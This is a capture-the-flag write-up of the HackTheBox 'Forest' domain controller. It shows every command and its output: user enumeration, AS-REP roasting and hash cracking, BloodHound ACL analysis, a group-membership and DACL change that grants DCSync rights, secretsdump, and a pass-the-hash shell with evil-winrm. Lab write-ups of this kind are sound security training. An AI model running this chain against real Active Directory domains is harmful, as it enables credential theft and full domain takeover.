Forest

Another HackTheBox AD box.

Enumeration:

Port Scanning:

First we will start with nmap to scan for open ports:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oN nmap/services.nmap -vv 10.129.95.210
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-03 04:54 EDT
Nmap scan report for 10.129.95.210
Host is up, received echo-reply ttl 127 (0.23s latency).
Scanned at 2025-09-03 04:54:27 EDT for 108s 
Not shown: 65512 closed tcp ports (reset)
PORT      STATE SERVICE      REASON          VERSION
53/tcp    open  domain       syn-ack ttl 127 Simple DNS Plus
88/tcp    open  kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-03 09:01:45Z)
135/tcp   open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap         syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?    syn-ack ttl 127
593/tcp   open  ncacn_http   syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped   syn-ack ttl 127
3268/tcp  open  ldap         syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped   syn-ack ttl 127
5985/tcp  open  http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0 
9389/tcp  open  mc-nmf       syn-ack ttl 127 .NET Message Framing
<snipped>
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

<snipped>
|_clock-skew: mean: 2h26m51s, deviation: 4h02m32s, median: 6m49s

The same open ports that indicate we are dealing with AD domain controller, dns on port 53, kerberos on port 88, smb on port 445, ldap ports, and we have winrm on port 5985, and the host name of the target machine is FOREST.

I will add the domain and the host name to the hosts file:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ cat /etc/hosts        
127.0.0.1       localhost
127.0.1.1       kali
<snipped>

10.129.95.210 FOREST.htb.local htb.local FOREST

We can see at the bottom of the nmap scan that the clock-skew is too great, so I will use ntpdate to sync it with the target host:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ sudo ntpdate 10.129.95.210

If we tried smb null session/guest session:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ netexec smb 10.129.95.210 -u '' -p ''                        
SMB         10.129.95.210   445    FOREST           [*] Windows 10 / Server 2016 Build 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True) 
SMB         10.129.95.210   445    FOREST           [+] htb.local\:

Guest account is disabled.

Lets enumerate the users via netexec but we can use other various tools such as impacket-lookupsid or even rpcclient:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ netexec smb 10.129.95.210 -u '' -p '' --users                                                                                                                           
SMB         10.129.95.210   445    FOREST           [*] Windows 10 / Server 2016 Build 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)               
SMB         10.129.95.210   445    FOREST           [+] htb.local\:                                                                                                         
SMB         10.129.95.210   445    FOREST           -Username-                    -Last PW Set-       -BadPW- -Description-                                                 
SMB         10.129.95.210   445    FOREST           Administrator                 2021-08-31 00:51:58 0       Built-in account for administering the computer/domain        
SMB         10.129.95.210   445    FOREST           Guest                         <never>             0       Built-in account for guest access to the computer/domain      
SMB         10.129.95.210   445    FOREST           krbtgt                        2019-09-18 10:53:23 0       Key Distribution Center Service Account                       
SMB         10.129.95.210   445    FOREST           DefaultAccount                <never>             0       A user account managed by the system.                         
<snipped>                                                                
SMB         10.129.95.210   445    FOREST           sebastien                     2019-09-20 00:29:59 0                                                                     
SMB         10.129.95.210   445    FOREST           lucinda                       2019-09-20 00:44:13 0                                                                     
SMB         10.129.95.210   445    FOREST           svc-alfresco                  2025-09-03 09:02:02 0                                                                     
SMB         10.129.95.210   445    FOREST           andy                          2019-09-22 22:44:16 0                                                                     
SMB         10.129.95.210   445    FOREST           mark                          2019-09-20 22:57:30 0                                                                     
SMB         10.129.95.210   445    FOREST           santi                         2019-09-20 23:02:55 0                                                                     
SMB         10.129.95.210   445    FOREST           [*] Enumerated 31 local users: HTB

I will add those users to a text file.

AS-REP Roasting:

Now I can try multiple attacks, such as password spraying, use the username as the password, or AS-REP Roasting:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ impacket-GetNPUsers htb.local/ -usersfile users.txt -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
<snipped>
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-alfresco@HTB.LOCAL:e73b60f4b56f1fe0a3f3ac784f529185$3eca9e381a0e88cb8c3a5f89dba8aaa117e36addf8aabaf41721abf9e392fba2ce4d4c75d234022d6f91c19e5b49f99e63dbf7
4963d696617b8b394167bf22935ecb18738d1399e628c156b3588d6920b38a69d767b5953794c579bad024081b2fd81d8e9b7cf1770e0ca873423c4d656b1f5245915fbbc26b487c1d75854637ce98fdc02cd6fe9497
766a5ecd6b0cbf77ce88cb91eaefc01b77be4538e1c4ac213a7b56ccebcffa164c3fe6826bac23084c8a822001d348c153a2e82a9b36489e5c4d1754349dcf8611e74410cc9251931ce3f47744dc52fc2b213e7cea7c
ce3b2a21290f13
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
<snipped>

Here we can see that svc-alfresco user has do not require preauth option enabled.

Lets save this ticket into a file and attempt to crack it using hashcat:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ hashcat svc-alfresco.hash /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting in autodetect mode

<snipped>

$krb5asrep$23$svc-alfresco@HTB.LOCAL:e73b60f4b56f1fe0a3f3ac784f529185$3eca9e381a0e88cb8c3a5f89dba8aaa117e36addf8aabaf41721abf9e392fba2ce4d4c75d234022d6f91c19e5b49f99e63dbf7
4963d696617b8b394167bf22935ecb18738d1399e628c156b3588d6920b38a69d767b5953794c579bad024081b2fd81d8e9b7cf1770e0ca873423c4d656b1f5245915fbbc26b487c1d75854637ce98fdc02cd6fe9497
766a5ecd6b0cbf77ce88cb91eaefc01b77be4538e1c4ac213a7b56ccebcffa164c3fe6826bac23084c8a822001d348c153a2e82a9b36489e5c4d1754349dcf8611e74410cc9251931ce3f47744dc52fc2b213e7cea7c
ce3b2a21290f13:s3rvice
                                                           
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$svc-alfresco@HTB.LOCAL:e73b60f4b56f1f...290f13
Time.Started.....: Wed Sep  3 05:00:17 2025 (3 secs)
Time.Estimated...: Wed Sep  3 05:00:20 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1314.7 kH/s (0.86ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4085760/14344385 (28.48%)
Rejected.........: 0/4085760 (0.00%)
Restore.Point....: 4082688/14344385 (28.46%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: s6509511 -> s3r3ndipit
Hardware.Mon.#1..: Util: 27%

<snipped>

Now we have valid domain user credentials htb.local/svc-alfresco:s3rvice.

BloodHound:

No interesting shares or user descriptions. So I will use netexec as the ingestor this time to collect the domain data:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ netexec ldap 10.129.95.210 -u svc-alfresco -p s3rvice --bloodhound -c all --dns-server 10.129.95.210
LDAP        10.129.95.210   389    FOREST           [*] Windows 10 / Server 2016 Build 14393 (name:FOREST) (domain:htb.local)
LDAP        10.129.95.210   389    FOREST           [+] htb.local\svc-alfresco:s3rvice 
LDAP        10.129.95.210   389    FOREST           Resolved collection methods: psremote, dcom, localadmin, session, container, acl, rdp, objectprops, trusts, group
LDAP        10.129.95.210   389    FOREST           Done in 01M 01S
LDAP        10.129.95.210   389    FOREST           Compressing output into /home/kali/.nxc/logs/FOREST_10.129.95.210_2025-09-03_060617_bloodhound.zip

And I will open up bloodhound:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ sudo bloodhound                                                                                                                                                         
[sudo] password for kali:                                                                                                                                                   
                                                                                                                                                                            
 Starting neo4j                                                                                                                                                             
Neo4j is not running.                                                                                                                                                       
Directories in use:                                                                                                                                                         
home:         /usr/share/neo4j                                                                                                                                              
config:       /usr/share/neo4j/conf                                                                                                                                         
logs:         /etc/neo4j/logs                                                                                                                                               
plugins:      /usr/share/neo4j/plugins                                                                                                                                      
import:       /usr/share/neo4j/import                                                                                                                                       
data:         /etc/neo4j/data                                                                                                                                               
certificates: /usr/share/neo4j/certificates                                                                                                                                 
licenses:     /usr/share/neo4j/licenses                                                                                                                                     
run:          /var/lib/neo4j/run                                                                                                                                            
Starting Neo4j.                                                                                                                                                             
Started neo4j (pid:106093). It is available at http://localhost:7474                                                                                                        
There may be a short delay until the server is ready.                                                                                                                       
................................................                                                                                                                            
 Bloodhound will start                                                                                                                                                      
                                                                                                                                                                            
 IMPORTANT: It will take time, please wait...
 
 <snipped>
 
 opening http://127.0.0.1:8080

I will unzip the collected .zip file, and upload ingested data to bloodhound:

Mark svc-alfresco as owned:

Privilege Escalation:

I will navigate to cypher and try some queries to try to find any interesting attack paths.

We will find that svc-alfresco is member of the Remote Management Users which implies that we can WinRm to the target machine and read the user flag.

Abuse ACLs:

I clicked on shortest paths from owned objects, and saw this:

We can see that we are member of the account operators group, and interestingly account operators group has GenericAll over multiple objects in the domain, including the Exchange Windows Permissions group:

And that group has WriteDacl over the domain, which if I added svc-alfresco to that group, I can grant him DCSync rights.

Add svc-alfresco to that group using the command provided by bloodhound itself:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ net rpc group addmem "Exchange Windows Permissions" "svc-alfresco" -U "htb.local"/"svc-alfresco"%"s3rvice" -S "forest.htb.local"

Check if the user has been added:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ net rpc group members "Exchange Windows Permissions" -U "htb.local"/"svc-alfresco"%"s3rvice" -S "forest.htb.local"              
HTB\Exchange Trusted Subsystem
HTB\svc-alfresco

We can see that we are member of that group, lets now grant ourselves DCSync rights using impacket-dacledit:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ impacket-dacledit -action 'write' -rights 'DCSync' -principal 'svc-alfresco' -target-dn 'DC=htb,DC=local' 'htb.local'/'svc-alfresco':'s3rvice'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] DACL backed up to dacledit-20250903-061628.bak
[*] DACL modified successfully!

And now with secretsdump we can perform the DCSync (Domain Controller Syncrhonization) attack:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ impacket-secretsdump htb.local/svc-alfresco:s3rvice@forest.htb.local                                                                           
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb****************:::
<snipped>
[*] Cleaning up...

Here we have the ntlm hash of the domain administrator, lets authenticate via winrm:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ evil-winrm -i 10.129.95.210 -u administrator -H 32693b11e6aa90eb****************
                                         
Evil-WinRM shell v3.7
                                         
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                         
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                         
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
htb\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
FOREST
*Evil-WinRM* PS C:\Users\Administrator\Documents> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : .htb 
   IPv6 Address. . . . . . . . . . . : dead:beef::ccde:52fe:5f28:8ca7
   Link-local IPv6 Address . . . . . : fe80::ccde:52fe:5f28:8ca7%5
   IPv4 Address. . . . . . . . . . . : 10.129.95.210
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f8ec%5
                                       10.129.0.1

Tunnel adapter isatap..htb:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : .htb

Here also we can read the flags:

*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\svc-alfresco\Desktop\user.txt
37338043b3f16983****************
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
39d59bca6dc4090c****************

PreviousActive NextSauna

Last updated 18 days ago

hashtagEnumeration:

hashtagPort Scanning:

hashtagAS-REP Roasting:

hashtagBloodHound:

hashtagPrivilege Escalation:

hashtagAbuse ACLs: